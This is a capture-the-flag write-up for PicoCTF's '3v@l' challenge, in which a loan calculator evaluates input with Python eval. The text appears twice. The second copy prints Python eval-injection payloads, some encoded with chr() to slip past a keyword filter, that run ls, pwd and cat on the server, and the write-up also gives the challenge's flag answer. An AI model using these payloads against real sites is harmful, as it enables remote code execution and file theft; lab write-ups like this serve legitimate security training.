PicoCTF 2025 - 3v@l
Problem
ABC Bank's website has a loan calculator to help its clients calculate the amount they pay if they take a loan from the bank. Unfortunately, they are using an eval function to calculate the loan. Bypassing this will give you Remote Code Execution (RCE). Can you exploit the bank's calculator and read the flag?
Author: Theoneste Byagutangaza
Ans: picoCTF{D0nt_Use_Unsecure_f@nctions5e20166b}
Solution:
First, enter the website.
I tried inputting 123.
We can see that the result is the same as the input. According to the problem, the server uses eval, so we can input anything to achieve RCE and read files.
Okay… the server filters out some sensitive words. Then I checked F12 and found this:
But we can try encoding the input.
We successfully executed it and could see the files, so we used pwd.
Next, we tried ls /.
Great! Now we cat the flag file.
PicoCTF 2025 - 3v@l
Solution:
First, enter the website.
I tried inputting 123.
We can see that the result is the same as the input. According to the problem, the server uses
eval, so we can input anything to achieve RCE and read files.__import__('os').popen('ls').read()Okay… the server filters out some sensitive words. Then I checked F12 and found this:
But we can try encoding the input.
__import__(chr(111)+chr(115)).popen(chr(108)+chr(115)).read()We successfully executed it and could see the files, so we used
pwd.__import__(chr(111)+chr(115)).popen(chr(112)+chr(119)+chr(100)).read()Next, we tried
ls /.__import__(chr(111)+chr(115)).popen(chr(108)+chr(115)+chr(32)+chr(47)).read()Great! Now we
catthe flag file.__import__(chr(111)+chr(115)).popen(chr(99)+chr(97)+chr(116)+chr(32)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)).read()